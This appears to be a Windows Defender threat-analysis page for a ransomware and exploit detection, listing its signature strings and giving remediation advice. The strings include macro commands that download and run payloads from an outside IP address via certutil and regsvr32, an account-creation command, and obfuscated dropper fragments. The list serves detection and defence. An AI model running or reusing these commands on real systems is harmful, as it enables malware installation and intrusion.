Ransom:Win32/CVE!pz - Windows Defender Threat Analysis

This threat, identified as Ransom:Win32/CVE!pz, is a concrete detection of a ransomware payload delivered through the exploitation of known vulnerabilities, including those related to ActiveX (OWC10.Spreadsheet), Silverlight, and potentially SMB/NTLM. It aims to achieve remote code execution to deploy ransomware, encrypting files for extortion and likely communicating with a command-and-control server.

Relevant strings associated with this threat:
 - = new ActiveXObject("OWC10.Spreadsheet"); (PEHSTR_EXT)
 - <script src="off.js"></script> (PEHSTR_EXT)
 - ++){try{obj.msDataSourceObject( (PEHSTR_EXT)
 - .php?ver=%VER%&cver=%CVER%&id=%ID% (PEHSTR_EXT)
 - NT LM 0.12 (PEHSTR_EXT)
 - \MAILSLOT\LANMANA (PEHSTR_EXT)
 - ;N/lc (SNID)
 - #\{m*a (SNID)
 - .`!Mr1 (SNID)
 - 45\u; (SNID)
 - +:/GS (SNID)
 - {Z}\) (SNID)
 - B\Kns, (SNID)
 - .gTr~C (SNID)
 - 0[qu/ (SNID)
 - x.>:# (SNID)
 - ZwCVE7 (SNID)
 - -jS (SNID)
 - "\>+> (SNID)
 - vBs (SNID)
 - <9\H_ (SNID)
 - (b,.W (SNID)
 - 5\n|=/ (SNID)
 - Fu_I<~wJ\W (SNID)
 - {P5.e (SNID)
 - <Tq'. (SNID)
 - \epathobj_exp\Release\epathobj_exp.pdb (PEHSTR_EXT)
 - Exploit ok run command (PEHSTR_EXT)
 - No luck, cleaning up. and try again.. (PEHSTR_EXT)
 - System.Windows.Browser (PEHSTR_EXT)
 - ScriptObject (PEHSTR_EXT)
 - :Class="asdgsd.miry" (PEHSTR_EXT)
 - x:Class="hsaytvxw17.App" (PEHSTR_EXT)
 - hsaytvxw17.g.resources (PEHSTR_EXT)
 - \EXP\SilverApp1\SilverApp1\obj\Debug\ (PEHSTR_EXT)
 - \EXP\SILVER_Preloader\Preloader\obj\Debug\ (PEHSTR_EXT)
 - eae6af6c.g.resources (PEHSTR_EXT)
 - k2hfPelkt.g.resources (PEHSTR_EXT)
 - x:Class="eae6af6c.MainPage" (PEHSTR_EXT)
 - x:Class="k2hfPelkt.MainPage" (PEHSTR_EXT)
 - \\.\WMIDataDevice (PEHSTR)
 - CVE (PEHSTR_EXT)
 - IsError CVErr( (MACROHSTR_EXT)
 - "cmd.exe /c P^" +  (MACROHSTR_EXT)
 - "md.exe /" + Format(ChrW( (MACROHSTR_EXT)
 - ^e^l^L^.^E^X^e^ (MACROHSTR_EXT)
 - Example: exp.exe "net user admin admin /ad" (PEHSTR_EXT)
 - \\.\WMIDataDevice (PEHSTR_EXT)
 - \ms16-014\Release\ms16-014.pdb (PEHSTR_EXT)
 - exp.exe "net user admin admin /ad (PEHSTR_EXT)
 - exp.exe "net user admin admin /tor (PEHSTR_EXT)
 - CVE-2018-8120 exploit by @unamer(https://github.com/unamer) (PEHSTR_EXT)
 - CVE-2018-8120 exploit Change by @Topsec_Alpha_lab(https://github.com/alphalab) (PEHSTR_EXT)
 - shell.Run("regsvr32 /u /n /s /i:http://127.0.0.1/payloooad.sct scrobj.dll", 0, False) (MACROHSTR_EXT)
 - Call MsgBox("Houston, we've had a problem!" & vbNewLine & "Microsoft Word processing error." (MACROHSTR_EXT)
 - /u /n /s /i:http://185.104.114.115/1.sct scrobj.dll", 0, False) (MACROHSTR_EXT)
 - .Run ("cmd.exe /c certutil.exe -urlcache -split -f http://185.104.114.115/123.exe sdfsdf.exe && start sdfsdf.exe") (MACROHSTR_EXT)
 - .Run ("cmd.exe /c cer" + "tutil.exe -url" + "cache -sp" + "lit -f http://185.104.114.115/123.exe sdfsdf.exe && start (MACROHSTR_EXT)
 - Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\ro" + "ot\default:" + "StdRegProv") (MACROHSTR_EXT)
 - msg = "This application appears to be made not supported format. [Error Code: -229] (MACROHSTR_EXT)
 - Dim sheasdll (MACROHSTR_EXT)
 - SCROLLBAR (PEHSTR)
 - CVE-2018-8120 (PEHSTR_EXT)
 - [+] Triggering vulnerability... (PEHSTR_EXT)
 - Example: exp.exe (PEHSTR_EXT)
 - ms15-051\Win32\ms15-051.pdb (PEHSTR)
 - = UserForm2.TextBox2.Tag + "\{ (MACROHSTR_EXT)
 - .dll (MACROHSTR_EXT)
 - KillArray ZipFolder & "\ (MACROHSTR_EXT)
 - .bin", ZipName (MACROHSTR_EXT)
 - = UserForm2.TextBox1.Tag & "\ (MACROHSTR_EXT)
 - .xlsx" (MACROHSTR_EXT)
 - Call VBA.Shell$( (MACROHSTR_EXT)
 - COMahawk.pdb (PEHSTR_EXT)
 - = ""bin.base64""" & vbCrLf (MACROHSTR_EXT)
 -  .vbs" (MACROHSTR_EXT)
 - s = s + "just_obj.exec RUNC" + vbCrLf (MACROHSTR_EXT)
 - strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev( myURL, ""/"" ) (MACROHSTR_EXT)
 - x = x + "\asc.txt" (MACROHSTR_EXT)
 - File = File + "vbs" (MACROHSTR_EXT)
 - s = s + "    Execute( (MACROHSTR_EXT)
 - s = s + "   path = path + ""\asc.txt (MACROHSTR_EXT)
 - .BuildPath( myPath, Mid( myURL, InStrRev( myURL, (MACROHSTR_EXT)
 - varstrlong = varstrlong + "   path = path + ""\asc.txt (MACROHSTR_EXT)
 - 0asc.txt" (MACROHSTR_EXT)
 - varstrlong = varstrlong + "Execute(""HTxTPDownload fsdfdsfs, (MACROHSTR_EXT)
 - ElseIf objFSO.FolderExists (MACROHSTR_EXT)
 - alxmd.Text = bace64 " + vbCrLf (MACROHSTR_EXT)
 - Execute(""byteArray = alxmd."" + novarue)" + vbCrLf (MACROHSTR_EXT)
 - If (fso.FileExists(path)) Then " + vbCrLf (MACROHSTR_EXT)
 - ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath, (MACROHSTR_EXT)
 - ldjdiu34h43gy43hut34 = ldjdiu34h43gy43hut34 + "Execute(""call grgergre28u38kDecode (MACROHSTR_EXT)
 - Execute(""strFile = objFSO."" + ""Build"" + (MACROHSTR_EXT)
 - Execute(""fso.DeleteFile(path)"") ' (MACROHSTR_EXT)
 - msg = path & "" doesn't exist.""" + vbCrLf (MACROHSTR_EXT)
 - Execute(""baax."" + ""Open"") " + vbCrLf (MACROHSTR_EXT)
 - path = path + ""\program""" + vbCrLf (MACROHSTR_EXT)
 - Application.Eval (bttttttttgggggggg4.Run(Path + TXTFile, yu67fre54kji, waitOnReturn)) (MACROHSTR_EXT)
 - cb4ijeur = cb4ijeur + "Execute (MACROHSTR_EXT)
 - jeojrvbsl4 = jeojrvbsl4 + "cft6ygvcr4rcvfgyu = "" (MACROHSTR_EXT)
 - jeojrvbsl4 = jeojrvbsl4 + (MACROHSTR_EXT)
 - & ".pdf" (MACROHSTR_EXT)
 - = fso.File"" + ""Exists(path)"")" + vbCrLf '0000 (MACROHSTR_EXT)
 - siunwufjsftw2 = siunwufjsftw2 + "cft6ygvcr4rcvfgyu = "" (MACROHSTR_EXT)
 - siunwufjsftw2 = siunwufjsftw2 + (MACROHSTR_EXT)
 - S3cur3Th1sSh1t/SharpByeBear (PEHSTR_EXT)
 - CVE_2019_1405 (PEHSTR_EXT)
 - Usage : sysret.exe <option> <argument> (PEHSTR_EXT)
 - = CreateProcessA(0&, cmdline$, 0&, 0&, 1&, _ (MACROHSTR_EXT)
 - bgfjeryhj57r6uj55jry6jr = bgfjeryhj57r6uj55jry6jr + ""in.""" + vbCrLf (MACROHSTR_EXT)
 - 1ZERO.EXE IP DC DOMAIN ADMIN_USERNAME [-c] COMMAND (PEHSTR)
 - /powershell.exe -c Reset-ComputerMachinePassword (PEHSTR)
 - ZERO.EXE IP DC DOMAIN (PEHSTR)
 - \COMMAND - command that will be executed on domain controller. should be surrounded by quotes (PEHSTR)
 - \$ UH (PEHSTR_EXT)
 - (IP DC DOMAIN ADMIN_USERNAME [-c] COMMAND (PEHSTR)
 - c:\ok_0000 (PEHSTR_EXT)
 - CVE-2021-31956: Ntfs Heap Vulnerability (PEHSTR_EXT)
 - CVE-2021-31956.pdb (PEHSTR_EXT)
 - ch3rn0byl.txt (PEHSTR_EXT)
 - CVE-2021-1675-LPE.pdb (PEHSTR_EXT)
 - ]]></report> (PEHSTR)
 - /upd/check.php? (PEHSTR)
 - .php?ver=%VER%&cver=%CVER (PEHSTR)
 - CVE-2021-31956-EXP-main (PEHSTR_EXT)
 - ConvertStringSecurityDescriptorToSecurityDescriptorA (PEHSTR_EXT)
 - ConsoleApplication11.pdb (PEHSTR_EXT)
 - Failed to execute CVE dll from memory, er (PEHSTR_EXT)
 - Failed to upload screenshot, erro (PEHSTR_EXT)
 - +"$(iwrhttps://www.mediafire.com/file/jad6397n5fjf3lv/2jnr7000.txt/file-" (MACROHSTR_EXT)
 - '.replace(' (MACROHSTR_EXT)
 - ProgramData\\1.bat (PEHSTR_EXT)
 - Swaping shell. (PEHSTR_EXT)
 - CVE-2018-8639-exp-master (PEHSTR_EXT)
 - exp.pdb (PEHSTR_EXT)
 - Trigger vul. (PEHSTR_EXT)
 - pSys/tem Token = (PEHSTR_EXT)
 - based on CVE-2019-0708 (PEHSTR_EXT)
 - payload_x64.dll (PEHSTR_EXT)
 - ipslist.txt (PEHSTR_EXT)
 - playbit@exploit.im (PEHSTR_EXT)
 - Injecting shellcode in winlogon... (PEHSTR_EXT)
 - Sending SMB negotiation request... (PEHSTR_EXT)
 - Couldn't leak ktoken of current process... (PEHSTR_EXT)
 - C:\Exploit\CVE-2023-28252\x64\Release\clfs_eop.pdb (PEHSTR_EXT)
 - NJs (PEHSTR_EXT)
 - CVE-2024-30088\x64\Release\poc.pdb (PEHSTR_EXT)
 - C:\Users\root\source\repos\CVE-2024-30088 (PEHSTR_EXT)
 - Release\poc.pdb (PEHSTR_EXT)
 - CVE-2024-26229_orig\x64\Release\CVE-2024-26229_orig.pdb (PEHSTR_EXT)
 - RemoteKrbRelay.Relay.Attacks.Http (PEHSTR_EXT)
 - RemoteKrbRelay.Clients.Attacks (PEHSTR_EXT)
 - Exploit\RemoteKrbRelay (PEHSTR_EXT)
 - \x64\Release\CVE-20 (PEHSTR_EXT)
 - CVE-2023-36802 (PEHSTR_EXT)
 - \CVE-2024-30088-main\ (PEHSTR_EXT)
 - C:\Windows\system32\cmd.exe (PEHSTR_EXT)
 - X[YZ^_]\AXAYAZA[A\A]A^A_H (PEHSTR_EXT)
 - \x64\Release\ (PEHSTR_EXT)
 - 2CVE-2023- (PEHSTR_EXT)
 - .exe <pid> (PEHSTR_EXT)
 - 64\Release\EfsPotato.pdb (PEHSTR_EXT)
 - \pipe\srvsvc (PEHSTR_EXT)
 - \Device\Mup\;Csc\.\. (PEHSTR_EXT)
 - cmd.exe (PEHSTR_EXT)
 - CVE-2024 (PEHSTR_EXT)
 - \Device\Afd\Endpoint (PEHSTR_EXT)
 - \pipe\LOCAL\im (PEHSTR_EXT)
 - \pipe\LOCAL\rw (PEHSTR_EXT)
 - \CVE-2024- (PEHSTR_EXT)
 - \x64\Release\CVE-2024- (PEHSTR_EXT)
 - CVE-2024-49138-POC.pdb (PEHSTR_EXT)
 - source\repos\CVE-2024-20656\Expl\x64\Release (PEHSTR_EXT)
 - exploit.zip (PEHSTR_EXT)
 - \shared (PEHSTR_EXT)
 - [*] Executing shellcode (PEHSTR_EXT)
 - [*] Exploit complete. Check for SYSTEM privileges (PEHSTR_EXT)
 - [*] cmd.exe PID: (PEHSTR_EXT)
 - \inf\ip (PEHSTR_EXT)
 - \liprip.dll (PEHSTR_EXT)
 - \fsutk.dll (PEHSTR_EXT)
 - %SystemRoot%\System32\svchost.exe -k netsvcs (PEHSTR_EXT)
 - NIPRP.DLL (PEHSTR_EXT)
 - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{DC888631-57F5-4AF4-86B3-BDE5F854DCBF}\ (PEHSTR_EXT)
 - Classes\CLSID\{0E5CBF21-D15F-11d0-8301-00AA005B4383}\InProcServer32\ (PEHSTR_EXT)
 - WS\inf\optkec.inf (PEHSTR_EXT)
 - http://www.baidu.com/s?wd= (PEHSTR_EXT)
 - http://www.google.cn/search?hl=zh-CN&q= (PEHSTR_EXT)
 - http://search.cn.yahoo.com/search?p= (PEHSTR_EXT)
 - http://www.sogou.com/web?sogouhome=&shuru=shou&query= (PEHSTR_EXT)
 - http://so.163.com/search.php?q= (PEHSTR_EXT)
 - \Help\ (PEHSTR_EXT)
 - CVER%# (PEHSTR_EXT)
 - http://dw.mtsou.com/ (PEHSTR_EXT)
 - \jbk.rar (FILEPATH)
 - \kentgo.log (FILEPATH)
 - \inf\iplbk.inf (FILEPATH)
 - \help\fkhfu.chi (FILEPATH)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)

Immediately isolate the infected system. Perform a comprehensive malware scan with updated antivirus definitions. Prioritize patching all operating systems, web browsers, and applications (especially Microsoft Office, Silverlight, and network services) to address exploited vulnerabilities. Restore compromised data from clean, verified backups and investigate the initial access vector to prevent future attacks.